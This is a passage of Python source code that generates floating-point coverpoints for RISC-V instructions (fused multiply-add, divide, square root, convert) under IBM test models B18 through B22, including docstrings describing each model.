rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset1 = ir_dataset
# Cancellation of B4
if flen == 32:
ieee754_maxnorm_p = '0x1.7fffffp+127'
ieee754_maxnorm_n = '0x1.7ffffep+127'
maxnum = float.fromhex(ieee754_maxnorm_p)
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
maxdec_p = str(maxnum)
maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset2 = ir_dataset
# Cancellation of B5
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
ir_dataset = []
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
ieee754_minnorm = '0x1.000000p-126'
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
minsubdec = '5e-324'
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
minnormdec = '2.2250738585072014e-308'
ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
n = len(ir_dataset)
for i in range(n):
ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset3 = ir_dataset
ir_dataset = ir_dataset1 + ir_dataset2 + ir_dataset3
coverpoints = []
k = 0
for c in b18_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B18 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b19(flen, opcode, ops, seed=-1):
'''
IBM Model B19 Definition:
This model checks various possible differences between the two inputs.
A test-case will be created for each combination of the following table::
First input Second input Difference between exponents Difference between significands
+Normal +Normal >0 >0
-Normal -Normal =0 =0
+SubNormal +SubNormal <0 <0
-SubNormal -SubNormal
0 0
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1 {operation} Operand2 = Derived from the table above
Implementation:
- Normal (positive and negative), subnormal (positive and negative) arrays are randomly initialized within their respectively declared ranges.
- The difference between exponents and significands are formed as per the conditions in the table.
- All possible combinations of the table are used in creating the test-cases.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmin':
random.seed(0)
elif opcode in 'fmax':
random.seed(1)
elif opcode in 'flt':
random.seed(2)
elif opcode in 'feq':
random.seed(3)
elif opcode in 'fle':
random.seed(3)
else:
random.seed(seed)
b19_comb = []
comment = []
normal = []
normal_neg = []
sub_normal = []
sub_normal_neg = []
zero = [[0e0,'Zero']]
for i in range(5):
normal.append([random.uniform(1,maxnum),'Normal'])
normal_neg.append([random.uniform(-1*maxnum,-1),'-Normal'])
sub_normal.append([random.uniform(minsubnorm,maxsubnorm),'Subnormal'])
sub_normal_neg.append([random.uniform(-1*maxsubnorm,-1*minsubnorm),'-Subnormal'])
all_num = normal + normal_neg + sub_normal + sub_normal_neg + zero
for i in all_num:
for j in all_num:
if i[0] != 0:
i_sig = str(i[0]).split('e')[0]
i_exp = str(i[0]).split('e')[1]
else:
i_sig = '0'
i_exp = '0'
if j[0] != 0:
j_sig = str(j[0]).split('e')[0]
j_exp = str(j[0]).split('e')[1]
else:
j_sig = '0'
j_exp = '0'
if float(i_sig) >= float(j_sig): sig_sign = '>='
else: sig_sign = '<'
if float(i_exp) >= float(j_exp): exp_sign = '>='
else: exp_sign = '<'
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(j_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+j_exp)
rs2 = float(j_sig+'e'+i_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs2_exp ' + exp_sign + ' rs1_exp')
rs1 = float(j_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs2_sigificand ' + sig_sign + ' rs1_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+j_exp)
rs2 = float(j_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp = rs2_exp')
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand = rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+i_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand = rs2_significand, rs1_exp = rs2_exp')
coverpoints = []
k = 0
for c in b19_comb:
cvpt = ""
for x in range(1, 3):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
cvpt += 'rm_val == 0'
elif opcode in ["fclass","flt","fmax","fsgnjn"]:
cvpt += 'rm_val == 1'
elif opcode in ["feq","flw","fsw","fsgnjx"]:
cvpt += 'rm_val == 2'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B19 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b20(flen, opcode, ops, seed=-1):
'''
IBM Model B20 Definition:
This model will create test-cases such that the significand of the intermediate results will cover each of the following patterns:
Mask on the intermediate result significand (excluding the leading “1” )
.. code-block::
xxx...xxx10
xxx...xx100
xxx...x1000
…
xx1...00000
x10...00000
100...00000
000...00000
The sticky bit of the intermediate result should always be 0. In case of the remainder operation, we will look at the result of the division in order to find the interesting test-cases.
Operation: Divide, Square-root.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [Random bits are taken initially to form xxx...xxx10. The pattern described above is then formed]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- A loop is initiated where random bits are obtained for which the subsequent sign, exponent is calculated for the intermediate value and stored in the ir_dataset.
- Operand 1 (rs1) is randomly initialized in the range (1, limnum) and the subsequent operator value is found.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if seed == -1:
if opcode in 'fdiv':
random.seed(1)
elif opcode in 'fsqrt':
random.seed(2)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
ir_dataset = []
for i in range(1,21,1):
for k in range(5):
bits = random.getrandbits(i)
bits = bin(bits)[2:]
front_zero = i-len(bits)
bits = '0'*front_zero + bits
trailing_zero = 22-i
sig = bits+'1'+'0'*trailing_zero
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
sig = '1'+'0'*22
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*22])
sig = '0'*23
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '0' + '0'*22])
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
ieee754_num = []
ir_dataset = []
for i in range(1,50,1):
for k in range(5):
bits = random.getrandbits(i)
bits = bin(bits)[2:]
front_zero = i-len(bits)
bits = '0'*front_zero + bits
trailing_zero = 51-i
sig = bits+'1'+'0'*trailing_zero
exp = random.getrandbits(11)
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
sig = '1'+'0'*51
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*51])
sig = '0'*52
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: ' + sig + ' Pattern: ' + '0' + '0'*52])
b8_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1, limnum)
if opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fdiv']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
coverpoints = []
k=0
for c in b8_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B20 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b21(flen, opcode, ops):
'''
IBM Model B21 Definition:
This model will test the Divide By Zero exception flag. For the operations divide and remainder, a test case will be created for each of the possible combinations from the following table:
First Operand : 0, Random non-zero number, Infinity, NaN
Second Operand : 0, Random non-zero number, Infinity, NaN
Operation: Divide, Remainder
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Final Results = [ Zero, Subnorm, Norm, Infinity, DefaultNaN, QNaN, SNaN ]
Implementation:
- The basic_types dataset is accumulated with the combinations of the abstract dataset description.
- Using python’s package itertools, a permutation of all possible combinations as a pair is computed for basic_types dataset..
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
if flen == 32:
basic_types = fzero + fsubnorm + fnorm + finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
[fsnan[0], fsnan[3]]
elif flen == 64:
basic_types = dzero + dsubnorm + dnorm +\
dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
[dsnan[0], dsnan[1]]
else:
logger.error('Invalid flen value!')
sys.exit(1)
# the following creates a cross product for ops number of variables
b21_comb = list(itertools.product(*ops*[basic_types]))
coverpoints = []
for c in b21_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode.split('.')[0] in ["fdiv"]:
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B21 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b22(flen, opcode, ops, seed=10):
'''
IBM Model B22 Definition:
This model creates test cases for each of the following exponents (unbiased):
1. Smaller than -3
2. All the values in the range [-3, integer width+3]
3. Larger than integer width + 3
For each exponent two cases will be randomly chosen, positive and negative.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1 = [Smaller than -3, All the values in the range [-3, integer width+3], Larger than integer width + 3]
Implementation:
- Random bits are calculated and appended to obtain the exponent ranges defined in case 2.
- To satisfy case 1 and case 3, similar steps are performed outside the loop and hence updated in the loop.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
if opcode[2] == 's': flen = 32
elif opcode[2] == 'd': flen = 64
getcontext().prec = 40
xlen = 0
if opcode in 'fcvt.w':
xlen = 32
elif opcode in 'fcvt.l':
xlen = 64
elif opcode in 'fcvt.wu':
xlen = 32
elif opcode in 'fcvt.lu':
xlen = 64
if seed == -1:
if opcode in 'fcvt.w':
random.seed(0)
elif opcode in 'fcvt.l':
random.seed(1)
elif opcode in 'fcvt.wu':
random.seed(2)
elif opcode in 'fcvt.lu':
random.seed(3)
else:
random.seed(seed)
b22_comb = []
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
op_dataset = []
for i in range(124,xlen+130,1):
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = i
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent in the range [-3, integer width+3]'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(0,124)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent less than -3'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(xlen+130,255)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent greater than (integer width+3)'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
op_dataset = []
for i in range(1020,xlen+1026,1):
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = i
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent in the range [-3, integer width+3]'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(0,1020)
exp = '{:011b}'.format(exp)
